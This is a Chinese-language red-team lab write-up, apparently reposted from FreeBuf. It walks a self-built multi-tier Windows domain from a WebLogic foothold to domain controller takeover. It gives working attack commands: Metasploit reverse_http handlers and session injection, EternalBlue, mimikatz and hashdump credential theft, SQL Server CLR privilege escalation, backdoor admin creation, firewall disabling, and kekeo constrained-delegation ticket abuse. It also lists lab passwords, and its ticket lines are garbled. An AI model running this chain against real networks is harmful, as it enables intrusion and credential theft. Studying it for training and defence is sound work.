wallhaven-2k67om

本次多层网络域渗透项目旨在模拟红队攻击人员在授权情况下对目标进行渗透,从外网打点到内网横向穿透,最终获得整个内网权限的过程,包含GPP漏洞利用,非约束委派和约束委派,CVE-2020-1472,SQLServer提权等等。

文中若有不当之处,还望各位大佬多多点评。

请注意:

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

靶场环境配置

网络拓扑图

整个环境共四台目标机,分别处在三层内网环境当中。

  • DMZ区环境IP段为 192.168.254.1/24

DMZ区的靶机拥有两个网卡,一个用来对外提供服务,一个用来连通第二次网络。

  • 第二层网络环境IP段为 10.10.20.1/24

第二层网络的靶机同样有两个网卡,一个连通第二层网络,一个连通第三层网络

  • 第三层网络环境IP段为 10.10.10.1/24

第三层网络的靶机只有一张网卡,连通第三层网络,包含域控机器与域内服务器

DMZ区域的主机可以连通外网,第二层与第三层的均不能与外网连接

image-20221111220232137

由于网络环境问题,192.168.254段的ip可能会有变化。

靶机信息

域控:Windows Server 2008 + IIS + Exchange 2013 邮件服务。

目录还原密码:redteam!@#45

主机名:owa

域管理员:administrator:

QWEasd123

Admin12345

域内服务器 Mssql:Windows Server 2008 + SQL Server 2008 (被配置了非约束委派)

主机名:sqlserver-2008

本地管理员:Administrator:Admin12345

域账户:redteam\sqlserver:Server12345 (被配置了约束委派)

Mssql:sa:sa

域内个人PC:Windows 7

主机名:work-7

本地管理员:john:admin!@#45

域账户:redteam\saul:admin!@#45

单机服务器:Windows server r2 + weblogic

主机名:weblogic

本地管理员:Administrator:Admin12345

weblogic :weblogic:weblogic123(访问 http://ip:7001

weblogic 安装目录:C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain

重启后需要手动开启服务

其他域用户:

域服务账户:redteam\sqlserver:Server12345 (被配置了约束委派)

邮件用户:redteam\mail:admin!@#45

加域账户:redteam\adduser:Add12345

redteam\saulgoodman:Saul12345 (被配置了非约束委派)

redteam\gu:Gu12345

redteam\apt404:Apt12345

漏洞利用

该靶场存在很多漏洞点都可以去尝试学习或利用

存在 GPP 漏洞

存在 MS14-068

存在 CVE-2020-1472

Exchange 各种漏洞都可尝试

可尝试非约束委派

可尝试约束委派

存在 CVE-2019-1388

存在 CVE-2019-0708

... 还有很多漏洞都可尝试

单机服务器

假定现在我们已经知道目标IP为:192.168.254.112。

信息收集

首先利用NMAP对靶标进行简易的扫描 

nmap -p- -Pn -T4 192.168.254.112 -A

image-20221111220258910

image-20221111220306052

根据扫描到的信息发现目标开放了7001端口,存在weblogic服务,

使用weblogicscan进行扫描看看是否存在漏洞,

image-20221111220312910

看起来还是存在很多漏洞的。

GetShell

使用weblogic-GUI进行注入,发现是administrator权限,直接注入内存马,冰蝎上线。

image-20221111220319841

image-20221111220326276

image-20221111220331813

域内个人PC机器

拿下了DMZ区域的机器后,除了权限维持和权限提升,对于横向渗透通常分为两个方面。

判断机器是否为多网卡机器,然后扫描其他网段,尝试发现更多存在漏洞的机器。

尽量收集机器上的敏感信息,比如敏感内部文件、账号密码本等,帮助后面快速突破防线。

由于拿下的机器已经是administrator权限,所以可以直接进行信息收集。

先查看一下进程里面是否存在杀软: 

tasklist /SVC

image-20221111220337868

image-20221111220344122

发现为双网卡,

image-20221111220350403

这里我直接上线CS,通过冰蝎上传exe后门并执行,

image-20221111220400239

上线后尝试抓一下密码,dump一下hash,

image-20221111220406577

导出密码hash: 

hashdump

image-20221111220411564 

received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

尝试去在线平台进行解密

https://www.cmd5.com/

image-20221111220423044

拿到Administrator的密码为Admin12345

查看是否在域内

net config workstation//查看计算机名、全名、用户名、系统版本、工作站、域、登录域。

image-20221111220428842

一般时间服务器为主域控制器

net time /domain//查看域控当前时间。

image-20221111220433462

机器并不在域内,由于是双网卡,这里利用fscan进行网段扫描。

上传了fscan到 C:\windows\temp\ 的目录下

image-20221111220438713

image-20221111220443009

然后这里通过CS插件直接运行fscan,

对另一张网卡的C段进行扫描,

image-20221111220448782

扫描结果如下

image-20221111220453069

这里通过这个靶场我们正好来学习CS和MSF的联动。

方法一:CS移交会话到MSF

当前情况主机上线在CS上,这里我们将CS的会话交互给MSF。

首先在CS上创建一个监听器,CS的监听器分为两种类型:beacon和foreign。

beacon为CS内置监听器,,当我们在目标系统执行payload,会弹回一个beacon的shell给CS

foreign主要是提供给外部使用的一些监听器,比如想要利用CS派生一个meterpreter的shell,来进行后续的内网渗透,这时就应该使用外部监听器。

image-20221111220458121

Host指向开启MSF的服务器,

MSF上面执行下面命令,

use exploit/multi/handler//使用监听模块

set payload windows/meterpreter/reverse_http//这个payload要跟CS设置的payload保持一致为http协议

set lhost 0.0.0.0//不设置也行,

set lport 8888//端口需要与cs监听器端口保持一致,因为cs的后门是反弹的8888端口。

image-20221111220502592

然后运行 

run

image-20221111220507207

然后在CS上执行Spawn,

image-20221111220511236

选择刚才添加的派生会话给MSF的监听器。

image-20221111220517164

然后可以看到msf收到了shell,

image-20221111220521882

执行命令出现乱码,对编码格式进行修改 

chcp65001

image-20221111220526255

MSF的session中输入shell获取目标主机的远程命令行shell,使用exit退出当前的shell。

如果想要退回到控制台界面,

background:把meterpreter后台挂起。

我们这里退回到meterpreter的位置,首先添加路由 

run get_local_subnets
run autoroute -s 10.10.20.0/24
run autoroute -p

image-20221111220530908

然后使用MSF上的ms17-010工具扫描一下。

将会话挂起,退到控制台界面 

background

image-20221111220535859 

search ms17-010
use 3
set rhost 10.10.20.7
run

image-20221111220538994

10.10.20.7机器存在ms17-010

现在可以利用exploit/windows/smb/ms17_010_eternalblue 进行攻击, 拿下该机器 

search ms17-010
use 0
set payload windows/x64/meterpreter/bind_tcp
set lport 11111
set rhosts 10.10.20.7
show options

image-20221111220543001

然后执行 

run

image-20221111220547435

我这里第一次攻击失败了,win7蓝屏了,重新尝试,成功。

image-20221111220550549

输入shell进入终端

查看ip

image-20221111220553945

通过ms17-010拿下win7

方法二:建立SOCKS隧道上线MSF

这里简略描述一下思路

首先在被控机器(weblogc服务所在机器)上传frp,建立SOCKS5隧道

然后使用MSF 

msfconsole
setg Proxies socks5:192.168.254.xxx:xxxx     //kali代理的ip和端口
setg ReverseAllowProxy true
use exploit/windows/smb/ms17-010-eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.10.20.7
run

方法一:win7执行payload上线CS

CS设置中转监听器

image-20221111220559045

image-20221111220603187

然后生成后门,选择刚才新建的监听器

image-20221111220607513

image-20221111220610465

把后门传到kali,然后在msf中使用命令上传到靶机win7上 


upload beacon.exe

image-20221111220613781

然后进入shell并执行 

shell
beacon.exe

这里要注意,weblogic服务所在机器并没有关闭防火墙 

netsh firewall show config

查看防火墙状态 

netsh adfirewall set allprofiles state off

关闭防火墙

然后就可以上线了

image-20221111220618018

方法二:MSF派生会话到CS

这里CS要准备一个监听器,上面新建的一个中转监听

img

MSf载入注入模块

首先看一下session的id

image-20221111220624632 

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 5678
set lhost 10.10.20.12
set session 3

域内服务器Mssql

我们先回到msf上面,加载mimikatz,抓取一下密码 

load mimikatz
creds_all

这里除了域用户的账号密码,还看到了域控的,继续尝试其他方式

image-20221111220628986

image-20221111220632396

查看网段发现新的网段,继续添加路由

image-20221111220635543 

run get_local_subnets
run autorouts -s 10.10.10.0/24
run autorouts -p

image-20221111220639252

这个时候我们已经通过MS17-010 -> mimikatz拿到了一个域用户的账号密码,尝试查找约束委派用户

上传一个fscan上去

image-20221111220644425 

fscan64.exe -h 10.10.10.0/24

image-20221111220647351

存在另外两个主机

使用adfind工具扫描 

# 查询配置了非约束委派的主机:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
# 查询配置了非约束委派的用户:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
# 查询配置了约束委派的主机:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

# 查询配置了约束委派的用户:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

image-20221111220652078

找到sqlserver的用户设置了约束委派

对10.10.10.18机器进行尝试

80 端口、1433 SQL server端口、445 SMB端口

这里通过FRP建立多层代理

windows上使用 proxifier 设置代理链

image-20221111220655061

访问80页面,没什么东西或者利用点

image-20221111220657926

尝试爆破SQL server密码

使用超级弱口令工具进行检查

image-20221111220701330

此时拿到了SQL server的密码

随后使用ShqrpSQLTools.exe工具对xp_cmdshell调用系统命令 

.\SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami

image-20221111220704630

目前的权限是nt authority\network service 即为普通服务权限

在MSSQL中可以使用CLR组件提权,可以参考下面文章提权

https://www.anquanke.com/post/id/250346

使用 SharpSQLTools 开启目标 clr,进行提权 

SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami

image-20221111220707690 

SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami

image-20221111220711640

提权成功

添加一个管理员权限用户,用户名为 ocean.com 密码为 qwe.123 

SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net user ocean.com qwe.123 /add"

image-20221111220714478

加入admin组 

SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net localgroup administrators ocean.com /add"

image-20221111220717822

查看用户 

SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net user"

接下来上线msf

配置代理proxychains,在/etc/proxychains.conf文件中进行修改

然后通过代理启动msf即可

或者进入msf添加代理 均可 

proxychains msfconsole

使用 mssql_clr_payload 模块 

use exploit/windows/mssql/mssql_clr_payload

这里生成中转上线的CS马,和上述过程一样,新建监听器,通过msf上传cs马,

使用 SharpSQLTools.exe 去执行 CS马,获取高权限用户,拿到 SQL server 主机。

域控

这里使用了约束委派拿域控,还有很多方式比如cve-2020-1472

上线CS之后拿到用户密码

img

通过约束委派攻击来接管域控

上传工具 kekeo,利用 kekeo 请求该用户的 TGT: 

[email protected][email protected]
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"

然后使用这个TGT获取域机器的ST 

kekeo.exe "tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/owa.redteam.red"

img

使用 mimikatz 将 ST2 导入当前会话即可,运行 mimikatz 进行 ptt 

mimikatz kerberos::ptt [email protected]@[email protected]

image-20221111220731067

拿到域控。

总结

通过上述过程,我们对比如GPP,约束委派,SQLServer提权有了新的认知或者理解,网络安全的学习离不开实际操作,想要搞明白漏洞更是要实际去复现学习。

最后希望大家提高安全意识,没有网络安全就没有国家安全!

本文作者:YLion, 转自FreeBuf